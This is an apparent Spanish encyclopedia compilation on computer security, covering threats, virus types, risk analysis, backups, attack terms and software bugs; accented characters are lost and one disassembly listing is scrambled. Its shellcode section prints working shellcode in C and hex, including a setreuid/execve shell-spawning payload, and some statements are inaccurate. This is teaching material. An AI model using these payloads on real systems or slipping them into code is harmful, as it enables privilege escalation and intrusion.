La seguridad informtica est concebida para proteger los activos informticos, entre los que se encuentran. La infraestructura computacional: Es una parte fundamental para el almacenamiento y gestin de la informacin, as como para el funcionamiento mismo de la organizacin. La funcin de la seguridad informtica en esta rea es velar que los equipos funcionen adecuadamente y anticiparse en caso de fallas, planes de robos, incendios, boicot, desastres naturales, fallas en el suministro elctrico y cualquier otro factor que atente contra la infraestructura informtica. Los usuarios Son las personas que utilizan la estructura tecnolgica, zona de comunicaciones y que gestionan la informacin. La seguridad informtica debe establecer normas que minimicen los riesgos a la informacin o infraestructura informtica. Estas normas incluyen horarios de funcionamiento, restricciones a ciertos lugares, autorizaciones, denegaciones, perfiles de usuario, planes de emergencia, protocolos y todo lo necesario que permita un buen nivel de seguridad informtica minimizando el impacto en el desempeo de los funcionarios y de la organizacin en general y como principal contribuyente al uso de programas realizados por programadores.

Amenazas
Una vez que la programacin y el funcionamiento de un dispositivo de almacenamiento (o transmisin) de la informacin se consideran seguras, todava deben ser tenidos en cuenta las circunstancias "no informticas" que pueden afectar a los datos, las cuales son a menudo imprevisibles o inevitables, de modo que la nica proteccin posible es la redundancia (en el caso de los datos) y la descentralizacin -por ejemplo mediante estructura de redes(en el caso de las comunicaciones). Estos fenmenos pueden ser causados por: El usuario: causa del mayor problema ligado a la seguridad de un sistema informtico (porque no le importa, no se da cuenta o a propsito). Programas maliciosos: programas destinados a perjudicar o a hacer un uso ilcito de los recursos del sistema. Es instalado (por inatencin o maldad) en el ordenador abriendo una puerta a intrusos o bien modificando los datos. Estos programas pueden ser un virus informtico, un gusano informtico, un troyano, una bomba lgica o un programa espa o Spyware.

Seguridad informtica Un intruso: persona que consigue acceder a los datos o programas de los cuales no tiene acceso permitido (cracker, defacer, script kiddie o Script boy, viruxer, etc.). Un siniestro (robo, incendio, inundacin): una mala manipulacin o una malintencin derivan a la prdida del material o de los archivos. El personal interno de Sistemas. Las pujas de poder que llevan a disociaciones entre los sectores y soluciones incompatibles para la seguridad informtica.

72

Tipos de amenaza
El hecho de conectar una red a un entorno externo nos da la posibilidad de que algn atacante pueda entrar en ella, con esto, se puede hacer robo de informacin o alterar el funcionamiento de la red. Sin embargo el hecho de que la red no sea conectada a un entorno externo no nos garantiza la seguridad de la misma. De acuerdo con el Computer Security Institute (CSI) de San Francisco aproximadamente entre 60 y 80 por ciento de los incidentes de red son causados desde adentro de la misma. Basado en esto podemos decir que existen 2 tipos de amenazas: Amenazas internas: Generalmente estas amenazas pueden ser ms serias que las externas por varias razones como son: -Los usuarios conocen la red y saben cmo es su funcionamiento. -Tienen algn nivel de acceso a la red por las mismas necesidades de su trabajo. -Los IPS y Firewalls son mecanismos no efectivos en amenazas internas. Amenazas externas: Son aquellas amenazas que se originan fuera de la red. Al no tener informacin certera de la red, un atacante tiene que realizar ciertos pasos para poder conocer qu es lo que hay en ella y buscar la manera de atacarla. La ventaja que se tiene en este caso es que el administrador de la red puede prevenir una buena parte de los ataques externos.

La amenaza informtica del futuro


Si en un momento el objetivo de los ataques fue cambiar las plataformas tecnolgicas ahora las tendencias cibercriminales indican que la nueva modalidad es manipular los certificados que contienen la informacin digital. El rea semntica, era reservada para los humanos, se convirti ahora en el ncleo de los ataques debido a la evolucin de la Web 2.0 y las redes sociales, factores que llevaron al nacimiento de la generacin 3.0. Se puede afirmar que la Web 3.0 otorga contenidos y significados de manera tal que pueden ser comprendidos por las computadoras, las cuales -por medio de tcnicas de inteligencia artificial- son capaces de emular y mejorar la obtencin de conocimiento, hasta el momento reservada a las personas. Es decir, se trata de dotar de significado a las pginas Web, y de ah el nombre de Web semntica o Sociedad del Conocimiento, como evolucin de la ya pasada Sociedad de la Informacin En este sentido, las amenazas informticas que viene en el futuro ya no son con la inclusin de troyanos en los sistemas o softwares espas, sino con el hecho de que los ataques se han profesionalizado y manipulan el significado del contenido virtual. La Web 3.0, basada en conceptos como elaborar, compartir y significar, est representando un desafo para los hackers que ya no utilizan las plataformas convencionales de ataque, sino que optan por modificar los significados del contenido digital, provocando as la confusin lgica del usuario y permitiendo de este modo la intrusin en los sistemas, La amenaza ya no solicita la clave de homebanking del desprevenido usuario, sino que directamente modifica el balance de la cuenta, asustando al internauta y, a partir de all, s efectuar el robo del capital. Para no ser presa de esta nueva ola de ataques ms sutiles, Se recomienda: Mantener las soluciones activadas y actualizadas.

Seguridad informtica Evitar realizar operaciones comerciales en computadoras de uso pblico. Verificar los archivos adjuntos de mensajes sospechosos y evitar su descarga en caso de duda.

73

Tipos de Virus
Los virus se pueden clasificar de la siguiente forma:

Virus residentes
La caracterstica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.

Virus de accin directa


Al contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario es reproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condicin, se activan y buscan los ficheros ubicados dentro de su mismo directorio para contagiarlos.

Virus de sobreescritura
Estos virus se caracterizan por destruir la informacin contenida en los ficheros que infectan. Cuando infectan un fichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles.

Virus de boot(bot_kill) o de arranque


Los trminos boot o sector de arranque hacen referencia a una seccin muy importante de un disco o unidad de almacenamiento CD,DVD, memorias USB etc. En ella se guarda la informacin esencial sobre las caractersticas del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actan infectando en primer lugar el sector de arranque de los dispositivos de almacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de boot infectar a su vez el disco duro. Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a ste ltimo con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contra escritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocido en el ordenador. Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.

Virus de enlace o directorio


Los ficheros se ubican en determinadas direcciones (compuestas bsicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos. Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensin EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que ste habr modificado la direccin donde se encontraba originalmente el programa, colocndose en su lugar. Una vez producida la infeccin, resulta imposible localizar y trabajar con los ficheros originales.

Seguridad informtica

74

Virus cifrados
Ms que un tipo de virus, se trata de una tcnica utilizada por algunos de ellos, que a su vez pueden pertenecer a otras clasificaciones. Estos virus se cifran a s mismos para no ser detectados por los programas antivirus. Para realizar sus actividades, el virus se descifra a s mismo y, cuando ha finalizado, se vuelve a cifrar.

Virus polimrficos
Son virus que en cada infeccin que realizan se cifran de una forma distinta (utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan una elevada cantidad de copias de s mismos e impiden que los antivirus los localicen a travs de la bsqueda de cadenas o firmas, por lo que suelen ser los virus ms costosos de detectar.

Virus multipartites
Virus muy avanzados, que pueden realizar mltiples infecciones, combinando diferentes tcnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.

Virus del Fichero


Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos.

Virus de FAT
La Tabla de Asignacin de Ficheros o FAT es la seccin de un disco utilizada para enlazar la informacin contenida en ste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirn el acceso a ciertas partes del disco, donde se almacenan los ficheros crticos para el normal funcionamiento del ordenador.

Anlisis de riesgos
Vase tambin: Anlisis de riesgo informtico El activo ms importante que se posee es la informacin y, por lo tanto, deben existir tcnicas que la aseguren, ms all de la seguridad fsica que se establezca sobre los equipos en los cuales se almacena. Estas tcnicas las brinda la seguridad lgica que consiste en la aplicacin de barreras y procedimientos que resguardan el acceso a los datos y slo permiten acceder a ellos a las personas autorizadas para hacerlo. Existe un viejo dicho en la seguridad informtica que dicta: "lo que no est permitido debe estar prohibido" y sta debe ser la meta perseguida. Los medios para conseguirlo son: 1. Restringir el acceso (de personas de la organizacin y de las que no lo son) a los programas y archivos. 2. Asegurar que los operadores puedan trabajar pero que no puedan modificar los programas ni los archivos que no correspondan (sin una supervisin minuciosa). 3. Asegurar que se utilicen los datos, archivos y programas correctos en/y/por el procedimiento elegido. 4. Asegurar que la informacin transmitida sea la misma que reciba el destinatario al cual se ha enviado y que no le llegue a otro. 5. Asegurar que existan sistemas y pasos de emergencia alternativos de transmisin entre diferentes puntos. 6. Organizar a cada uno de los empleados por jerarqua informtica, con claves distintas y permisos bien establecidos, en todos y cada uno de los sistemas o aplicaciones empleadas. 7. Actualizar constantemente las contraseas de accesos a los sistemas de cmputo.

Seguridad informtica

75

Elementos de un anlisis de riesgo


Cuando se pretende disear o crear una tcnica para implementar un anlisis de riesgo informtico se pueden tomar los siguientes puntos como referencia a seguir: Planes para reducir los riesgos.

Anlisis de impacto al negocio


El reto es asignar estratgicamente los recursos para cada equipo de seguridad y bienes que intervengan, basndose en el impacto potencial para el negocio, respecto a los diversos incidentes que se deben resolver. Para determinar el establecimiento de prioridades, el sistema de gestin de incidentes necesita saber el valor de los sistemas de informacin que pueden ser potencialmente afectados por incidentes de seguridad. Esto puede implicar que alguien dentro de la organizacin asigne un valor monetario a cada equipo y un archivo en la red o asignar un valor relativo a cada sistema y la informacin sobre ella. Dentro de los Valores para el sistema se pueden distinguir: Confidencialidad de la informacin, la Integridad (aplicaciones e informacin) y finalmente la Disponibilidad del sistema. Cada uno de estos valores es un sistema independiente del negocio, supongamos el siguiente ejemplo, un servidor Web pblico pueden poseer los requisitos de confidencialidad de baja (ya que toda la informacin es pblica),pero de alta disponibilidad y los requisitos de integridad. En contraste, un sistema de planificacin de recursos empresariales (ERP), sistema puede poseer alto puntaje en los tres variables. Los incidentes individuales pueden variar ampliamente en trminos de alcance e importancia.

Puesta en marcha de una poltica de seguridad


Actualmente las legislaciones nacionales de los Estados, obligan a las empresas, instituciones pblicas a implantar una poltica de seguridad. Ej: En Espaa la Ley Orgnica de Proteccin de Datos o tambin llamada LOPD y su normativa de desarrollo. Generalmente se ocupa exclusivamente a asegurar los derechos de acceso a los datos y recursos con las herramientas de control y mecanismos de identificacin. Estos mecanismos permiten saber que los operadores tienen slo los permisos que se les dio. La seguridad informtica debe ser estudiada para que no impida el trabajo de los operadores en lo que les es necesario y que puedan utilizar el sistema informtico con toda confianza. Por eso en lo referente a elaborar una poltica de seguridad, conviene: Elaborar reglas y procedimientos para cada servicio de la organizacin. Definir las acciones a emprender y elegir las personas a contactar en caso de detectar una posible intrusin Sensibilizar a los operadores con los problemas ligados con la seguridad de los sistemas informticos. Los derechos de acceso de los operadores deben ser definidos por los responsables jerrquicos y no por los administradores informticos, los cuales tienen que conseguir que los recursos y derechos de acceso sean coherentes con la poltica de seguridad definida. Adems, como el administrador suele ser el nico en conocer perfectamente el sistema, tiene que derivar a la directiva cualquier problema e informacin relevante sobre la seguridad, y eventualmente aconsejar estrategias a poner en marcha, as como ser el punto de entrada de la comunicacin a los trabajadores sobre problemas y recomendaciones en trmino de seguridad informtica.

Seguridad informtica

76

Tcnicas para asegurar el sistema


Codificar la informacin: Criptologa, Criptografa y Criptociencia, contraseas difciles de averiguar a partir de datos personales del individuo. Vigilancia de red. Zona desmilitarizada (informtica) Tecnologas repelentes o protectoras: cortafuegos, sistema de deteccin de intrusos - antispyware, antivirus, llaves para proteccin de software, etc. Mantener los sistemas de informacin con las actualizaciones que ms impacten en la seguridad. Sistema de Respaldo Remoto. Servicio de backup remoto

Respaldo de Informacin
La informacin constituye el activo ms importante de las empresas, pudiendo verse afectada por muchos factores tales como robos, incendios, fallas de disco, virus u otros. Desde el punto de vista de la empresa, uno de los problemas ms importantes que debe resolver es la proteccin permanente de su informacin crtica. La medida ms eficiente para la proteccin de los datos es determinar una buena poltica de copias de seguridad o backups: Este debe incluir copias de seguridad completa (los datos son almacenados en su totalidad la primera vez) y copias de seguridad incrementales (slo se copian los ficheros creados o modificados desde el ltimo backup). Es vital para las empresas elaborar un plan de backup en funcin del volumen de informacin generada y la cantidad de equipos crticos. Un buen sistema de respaldo debe contar con ciertas caractersticas indispensables: Continuo El respaldo de datos debe ser completamente automtico y continuo. Debe funcionar de forma transparente, sin intervenir en las tareas que se encuentra realizando el usuario. Seguro Muchos softwares de respaldo incluyen cifrado de datos (128-448 bits), lo cual debe ser hecho localmente en el equipo antes del envo de la informacin. Remoto Los datos deben quedar alojados en dependencias alejadas de la empresa. Mantencin de versiones anteriores de los datos Se debe contar con un sistema que permita la recuperacin de versiones diarias, semanales y mensuales de los datos. Hoy en da los sistemas de respaldo de informacin online (Servicio de backup remoto) estn ganando terreno en las empresas y organismos gubernamentales. La mayora de los sistemas modernos de respaldo de informacin online cuentan con las mximas medidas de seguridad y disponibilidad de datos. Estos sistemas permiten a las empresas crecer en volumen de informacin sin tener que estar preocupados de aumentar su dotacin fsica de servidores y sistemas de almacenamiento.

Seguridad informtica

77

Consideraciones de software
Tener instalado en la mquina nicamente el software necesario reduce riesgos. As mismo tener controlado el software asegura la calidad de la procedencia del mismo (el software obtenido de forma ilegal o sin garantas aumenta los riesgos). En todo caso un inventario de software proporciona un mtodo correcto de asegurar la reinstalacin en caso de desastre. El software con mtodos de instalacin rpidos facilita tambin la reinstalacin en caso de contingencia. Existe un software que es conocido por la cantidad de agujeros de seguridad que introduce. Se pueden buscar alternativas que proporcionen iguales funcionalidades pero permitiendo una seguridad extra.

Consideraciones de una red


Los puntos de entrada en la red son generalmente el correo, las pginas web y la entrada de ficheros desde discos, o de ordenadores ajenos, como porttiles. Mantener al mximo el nmero de recursos de red slo en modo lectura, impide que ordenadores infectados propaguen virus. En el mismo sentido se pueden reducir los permisos de los usuarios al mnimo. Se pueden centralizar los datos de forma que detectores de virus en modo batch puedan trabajar durante el tiempo inactivo de las mquinas. Controlar y monitorizar el acceso a Internet puede detectar, en fases de recuperacin, cmo se ha introducido el virus.

Algunas afirmaciones errneas comunes acerca de la seguridad


Mi sistema no es importante para un hacker Esta afirmacin se basa en la idea de que no introducir contraseas seguras en una empresa no entraa riesgos pues quin va a querer obtener informacin ma?. Sin embargo, dado que los mtodos de contagio se realizan por medio de programas automticos, desde unas mquinas a otras, estos no distinguen buenos de malos, interesantes de no interesantes, etc. Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a los virus. Estoy protegido pues no abro archivos que no conozco Esto es falso, pues existen mltiples formas de contagio, adems los programas realizan acciones sin la supervisin del usuario poniendo en riesgo los sistemas. Como tengo antivirus estoy protegido En general los programas antivirus no son capaces de detectar todas las posibles formas de contagio existentes, ni las nuevas que pudieran aparecer conforme los ordenadores aumenten las capacidades de comunicacin, adems los antivirus son vulnerables a desbordamientos de bfer que hacen que la seguridad del sistema operativo se vea ms afectada an. Como dispongo de un firewall no me contagio Esto nicamente proporciona una limitada capacidad de respuesta. Las formas de infectarse en una red son mltiples. Unas provienen directamente de accesos al sistema (de lo que protege un firewall) y otras de conexiones que se realizan (de las que no me protege). Emplear usuarios con altos privilegios para realizar conexiones puede entraar riesgos, adems los firewalls de aplicacin (los ms usados) no brindan proteccin suficiente contra el spoofing. Tengo un servidor web cuyo sistema operativo es un Unix actualizado a la fecha Puede que este protegido contra ataques directamente hacia el ncleo, pero si alguna de las aplicaciones web (PHP, Perl, Cpanel, etc.) est desactualizada, un ataque sobre algn script de dicha aplicacin puede permitir que el atacante abra una shell y por ende ejecutar comandos en el unix.

Seguridad informtica

78

Organismos oficiales de seguridad informtica


Existen organismos oficiales encargados de asegurar servicios de prevencin de riesgos y asistencia a los tratamientos de incidencias, tales como el CERT/CC [1] (Computer Emergency Response Team Coordination Center) del SEI [2] (Software Engineering Institute) de la Carnegie Mellon University el cual es un centro de alerta y reaccin frente a los ataques informticos, destinados a las empresas o administradores, pero generalmente estas informaciones son accesibles a todo el mundo.

Enlaces externos
Wikilibros Wikilibros alberga un libro o manual sobre Seguridad informtica. Seguridad informtica [3] en Open Directory Project.

Referencias
[1] http:/ / www. cert. org [2] http:/ / www. sei. cmu. edu/ [3] http:/ / dmoz. org/ World/ Espaol/ Computadoras/ Seguridad/

Inseguridad informtica
La inseguridad informtica es la falta o poca presencia de seguridad informtica en un sistema operativo, aplicacin, red o dispositivo, esto permite su demostracin por hackers ticos (sombreros blancos) o su explotacin por hackers mal intencionados (sombreros negros).

Vulnerabilidades
Abusos CGI
Son vulnerabilidades que pueden ser explotadas de forma remota mediante la ejecucin de un script desde el navegador (generalmente por http) del atacante sobre el cgi-bin del servidor, esto permite el acceso y manejo de informacin restringida.

Inyeccin SQL
Muchos hackers efectan gets explotando una vulnerabilidad que permite efectuar una inyeccin SQL, esto permite obtener nombre de usuarios, contraseas, etc. Un XSS (Cross Site Scripting) es una vulnerabilidad provocada por la falta o error de validacin en el cdigo html, esto permite la inclusin de cualquier tipo de sintaxis html y logra comprometer la seguridad de la persona que accede a un exploit de xss desde su navegador cuando este incluye algn scripts (VBS, JS) malicioso que pretende infectar su sistema operativo o secuestrar contraseas, cookies, etc. Es tambin conocido como "Inyeccin HTML".

Inseguridad informtica

79

Hacking
El hacking es el arte de la intrusin directa a un sistema informtico ayudndose de alguna vulnerabilidad, sus intenciones varan desde demostrar dicha vulnerabilidad en un sistema operativo, aplicacin, red o dispositivo para luego crear un parche que logre remendar esa situacin, hasta explotar esa vulnerabilidad para fines perjudiciales para la vctima o beneficiosos para los intrusos.

Hijacking
El hijacking (del ingls "secuestrar") consiste en ocupar una identidad obteniendo acceso no autorizado a un sistema, mdem, cuenta (correo electrnico, banco, etc.) para poder falsificar la identidad de esta persona (autentificacin).

DoS y DDoS
Los ataques del tipo DoS (Denial of Service) y los ataques DDoS (Distributed Denial of Service) son utilizados generalmente para hacer flood en un servidor y algunas veces hasta logran efectuar un kernel panic en el sistema operativo del servidor.

Spoofing
El Spoofing es una tcnica del hacking que consiste en falsificar los paquetes enviados, para obtener acceso a un servidor, mdem o cualquier otro dispositivo. En trminos de seguridad de redes hace referencia al uso de tcnicas de suplantacin de identidad generalmente con usos maliciosos o de investigacin. IP SPOOFING: Suplantacin de IP. Consiste bsicamente en sustituir la direccin IP origen de un paquete TCP/IP por otra direccin IP a la cual se desea suplantar. Esto se consigue generalmente gracias a programas destinados a ello y puede ser usado para cualquier protocolo dentro de TCP/IP como ICMP, UDP o TCP. Hay que tener en cuenta que las respuestas del host que reciba los paquetes irn dirigidas a la IP falsificada. Por ejemplo si enviamos un ping (paquete icmp "echo request") spoofeado, la respuesta ser recibida por el host al que pertenece la IP legalmente. Hay que tener en cuenta que los routers actuales no admiten el envo de paquetes con IP origen no perteneciente a una de las redes que administra (los paquetes spoofeados no sobrepasarn el router).

Ingeniera social
La ingeniera social consiste en la utilizacin de tcnicas de ndole psicolgica, para lograr obtener informacin confidencial.

Cracking
El cracking es un paradigma del hacking que consiste en saltar barreras impuestas por los sistemas de seguridad informtica (criptografa, autentificacin, validacin), el cracking tambin consiste en la modificacin de software compilado, agregndole funciones o eliminar las trabas como tiempo de uso (software trial).

Inseguridad informtica

80

Fuerza bruta
En criptografa El ataque de fuerza bruta en criptografa consiste en descubrir la clave de un cifrado basndose en su de algoritmo y en una clave similar, la fuerza bruta no puede romper claves modernas como RSA y AES entre otras. En autentificaciones Un ataque de fuerza bruta en una autentificacin consiste en realizar una gran cantidad de intentos de acceso, cuya contrasea es variada cada vez que es ingresada, siguiendo una lgica en particular.

Desbordamiento de pila
En informtica, un desbordamiento de pila (stack overflow/overrun) es un problema aritmtico que hace referencia al exceso de flujo de datos almacenados en la pila de una funcin, esto permite que la direccin de retorno de la pila pueda ser modificada por otra parte de un atacante para obtener un beneficio propio, que generalmente es malicioso.

Desbordamiento de montculo
En informtica, un desbordamiento de montculo (heap overflow/overrun) es un problema aritmtico que hace referencia al exceso de flujo de datos sobre un montculo, esto permite un acceso no autorizado a la memoria por parte de un comando o de un programa o script denominado shellcode.

Shellcode
Una shellcode es un conjunto de rdenes programadas generalmente en lenguaje ensamblador y trasladadas a opcodes que suelen ser inyectadas en la pila (o stack) de ejecucin de un programa para conseguir que la mquina en la que reside se ejecute la operacin que se haya programado. El trmino shellcode deriva de su propsito general, esto era una porcin de un exploit utilizada para obtener una shell. Este es actualmente el propsito ms comn con que se utilizan. Para crear una shellcode generalmente suele utilizarse un lenguaje de ms alto nivel, como es el caso del lenguaje C, para luego, al ser compilado, generar el cdigo de mquina correspondiente, que es denominado opcode. Un ejemplo de una shellcode escrita en C: #include <unistd.h> int main() { char *scode[2]; scode[0] = "/bin/sh"; scode[1] = NULL; execve (scode[0], scode, NULL); } Esta shellcode, que ejecuta la shell /bin/sh, se vale de la llamada al sistema execve para realizar la ejecucin de la shell contenida dentro del array scode. Si analizamos esto en lenguaje ensamblador el funcionamiento es simple: la llamada al sistema especfica es cargada detro del registro EAX, los argumentos de la llamada al sistema son puestos en otros registros, se ejecuta la instruccin int 0x80 (que producir la llamada al sistema) para la creacin del

Shellcode proceso (pueder hacerse tanto con fork() como con system()), la CPU cambiar ahora al kernel mode (supervisor ring 0), y la llamada al sistema ser ejecutada para as devolver, en este caso, una shell /bin/sh. Si compilamos y ejecutamos esto, obtendremos: $: gcc -static scode.c -o scode $: ./scode sh-3.2$ Para obtener el cdigo mquina se desensambla el archivo ya compilado (binario). Pueden utilizarse diversas aplicaciones para esta tarea, entre ellas una de las ms populares para sistemas del tipo Unix, es objdump. $: objdump -d scode 080483a4 <main>: 80483a4: 55 80483a5: 89 e5 80483a7: 83 e4 80483aa: 83 ec 80483ad: c7 44 80483b4: 08 80483b5: c7 44 80483bc: 00 80483bd: 8b 44 80483c1: c7 44 80483c8: 00 80483c9: 8d 54 80483cd: 89 54 80483d1: 89 04 80483d4: e8 ff 80483d9: c9 80483da: c3 80483db: 90

81

f0 20 24 18 a0 84 04 24 1c 00 00 00 24 18 24 08 00 00 00 24 18 24 04 24 fe ff ff

push mov and sub movl movl mov movl lea mov mov call leave ret nop

%ebp %esp,%ebp $0xfffffff0,%esp $0x20,%esp $0x80484a0,0x18(%esp) $0x0,0x1c(%esp) 0x18(%esp),%eax $0x0,0x8(%esp) 0x18(%esp),%edx %edx,0x4(%esp) %eax,(%esp) 80482d8 <execve@plt>

En el siguiente ejemplo se muestra una shellcode contenida en un array de un programa escrito en lenguaje C: char shellcode[]= "\x31\xc0" "\x31\xdb" "\x31\xc9" "\xb0\x46" "\xcd\x80" "\x50" "\x68""/ash" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\xb0\x0b" "\xcd\x80"

/* /* /* /* /* /* /* /* /* /* /* /* /* /*

xorl xorl xorl movl int pushl pushl pushl movl pushl pushl movl movb int

%eax,%eax %ebx,%ebx %ecx,%ecx $0x46,%al $0x80 %eax $0x6873612f $0x6e69622f %esp,%ebx %eax %ebx %esp,%ecx $0x0b,%al $0x80

*/ */ */ */ */ */ */ */ */ */ */ */ */ */

Shellcode ; As tenemos que una shellcode es cdigo mquina escrito en notacin hexadecimal. Posteriormente se utilizan dentro de programas escritos en C, como en el siguiente shellcode de ejemplo: // shellcode.c // compilar con gcc shellcode.c -o shellcode void main() { ((void(*)(void)) { "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9" "\xb0\x04\xb3\x01\x59\xb2\x21\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff" "\xff\xff\x76\x69\x73\x69\x74\x61\x20\x68" "\x74\x74\x70\x3a\x2f\x2f\x68\x65\x69\x6e" "\x7a\x2e\x68\x65\x72\x6c\x69\x74\x7a\x2e" "\x63\x6c\x20\x3d\x29" } )(); } Las shellcodes deben ser cortas para poder ser inyectadas dentro de la pila, que generalmente suele ser un espacio reducido. Las shellcodes se utilizan para ejecutar cdigo aprovechando ciertas vulnerabilidades en el cdigo llamadas desbordamiento de bfer. Principalmente el shellcode se programa para permitir ejecutar un intrprete de comandos en el equipo afectado. Es comn que en la compilacin de una shellcode se produzcan bytes nulos, los cuales deben ser eliminados de la misma, ya que frenaran la ejecucin de la shellcode. Para ello el programador se vale de diversas tcnicas, como remplazar las instrucciones que genera bytes NULL por otras que no lo hagan o realizar una operacin XOR, mover hacia registros ms pequeos (como AH, AL), y de esta forma permitir que la shellcode sea realmente inyectable.

82

Error de software

83

Error de software
Un error de software, comnmente conocido como bug (bicho), es un error o fallo en un programa de computador o sistema de software que desencadena un resultado indeseado. En 1947, los creadores de Mark III informaron del primer caso de error en un ordenador causado por un bug. El Mark II, ordenador sucesor de ASCC Mark II, construido en 1944, sufri un fallo en un rel electromagntico. Cuando se investig ese rel, se encontr una polilla que provoc que el rel quedase abierto. Grace Murray Hopper, licenciada en Fsica y destacada matemtica que trabaj como programadora en el Mark II, peg el insecto con cinta adhesiva en la bitcora (imagen [1]) y se refiri a ella como "bicho" para describir la causa del problema.
Foto del origen de la leyenda acerca del primer "bug" informtico conocido.

Este incidente es errneamente conocido por algunos como el origen de la utilizacin del trmino ingls "bug" (bicho) para indicar un problema en un aparato o sistema.[2][3] En realidad, Thomas Alva Edison ya haba utilizado "bug" en algunas anotaciones relacionadas con interferencias y mal funcionamiento. Grace lo asoci por primera vez a la informtica, en este caso, relacionado a un insecto real. No obstante, durante los aos 50 del Siglo XX, Grace tambin emple el trmino "debug" al hablar de la depuracin de errores en los cdigos de programacin. Los programas que ayudan a deteccin y eliminacin de errores de programacin de software son denominados depuradores (debuggers)

Defectos de diseo de programas


Diseos con colores inapropiados para las personas que padecen daltonismo Diseos que usan textos con tipografas de difcil lectura por su tamao o diseo. Diseos que fuerzan el uso del ratn o mouse sin dejar alternativas de teclado para personas con disfunciones motrices. Diseos con implicaciones culturales, por ejemplo usando partes del cuerpo que en una determinada cultura sean objeto de vergenza o burla o smbolos con caractersticas de identidad cultural o religiosa. Estimar que el equipo donde se instalar tiene determinadas caractersticas (como la resolucin de la pantalla, la velocidad del procesador, la cantidad de memoria o conectividad a internet) propias de un equipo de gama alta, en vez de disear el software para su ejecucin en equipos normales.

Errores de programacin comunes


Divisin por cero Ciclo infinito Problemas aritmticos como desbordamientos (overflow) o subdesbordamientos (underflow). Exceder el tamao del array Utilizar una variable no inicializada Acceder a memoria no permitida (access violation) Prdida de memoria (memory leak) Desbordamiento o subdesbordamiento de la pila (estructura de datos)

Desbordamiento de bfer (buffer overflow) Bloqueo mutuo (deadlock)

Error de software Indizado inadecuado de tablas en bases de datos.

84

Defectos de instalacin o programacin


Eliminacin o sustitucin de bibliotecas comunes a ms de un programa o del sistema (DLL Hell). Reiniciar arbitrariamente la sesin de un usuario para que la instalacin tenga efecto. Presuponer que el usuario tiene una conexin permanente a internet. Utilizar como fuente de datos enlaces simblicos a ficheros que pueden cambiar de ubicacin.

Cdigos de errores de lenguajes de programacin


La mayor parte de los lenguajes de programacin presentan al menos dos tipos de errores que permiten a los programadores manejar las fallas de los programas de una manera eficiente y que no resulte agresiva con el usuario final. Dichos errores son de compilacin y errores en tiempo de ejecucin. Los errores de compilacin normalmente inhiben que el cdigo fuente derive en un programa ejecutable, mientras que los errores en tiempo de ejecucin son situaciones especficas en las que un evento externo al programa impide su ejecucin. Regularmente un programador eficiente debe intentar imaginar como debe responder ante esos eventos de manera que sea el programa y no el usuario o el sistema operativo los que resuelvan el problema. As por ejemplo un bloque de error no manejado podra hacer lo siguiente: Abre el archivo "miarchivo" para escritura comienza a escribir datos en mi archivo cierra el archivo Si "miarchivo" no existe (o el programa o el usuario no tienen privilegios suficientes para abrirlo), el sistema operativo regresar un error que el programa no atrapar y tendremos un mensaje como "El archivo "miarchivo" no puede ser abierto para escritura" y botones para reintentar, cancelar y abortar (en el sistema operativo Windows), que no tendrn otra accin que repetirse indefinidamente sin posibilidad de salir de ese ciclo como no sea dando por terminado violentamente el programa. Un cdigo que permitiese atrapar el error en tiempo de ejecucin sera:
Abre el archivo "miarchivo" para escritura Si el sistema operativo lo permite comienza a escribir datos en "miarchivo" si no lo permiti informa al usuario de lo que sucede regresa al usuario a un punto donde no haya conflicto (el men principal, por ejemplo) Contina operando normalmente

Los diferentes lenguajes de programacin permiten diferentes construcciones lgicas a los programadores para atrapar y resolver errores en tiempo de ejecucin, como pueden ser las sentencias assert, try y on error en diferentes lenguajes de programacin.

Error de software

85

Enlaces externos
Buscador de Vulnerabilidades por productos de INTECO-CERT [4]

Referencias
[1] http:/ / ei. cs. vt. edu/ ~history/ Bug. GIF [2] bug (http:/ / www. catb. org/ jargon/ html/ B/ bug. html) [3] La polilla que vol dentro de un ordenador y el origen de bug informtico | Microsiervos (Leyendas Urbanas) (http:/ / www. microsiervos. com/ archivo/ leyendas-urbanas/ polilla-volo-en-ordenador-y-origen-leyenda-bug. html) [4] http:/ / cert. inteco. es/ vulnSearch/ Actualidad/ Actualidad_Vulnerabilidades/ buscador_vulnerabilidades

Hacker
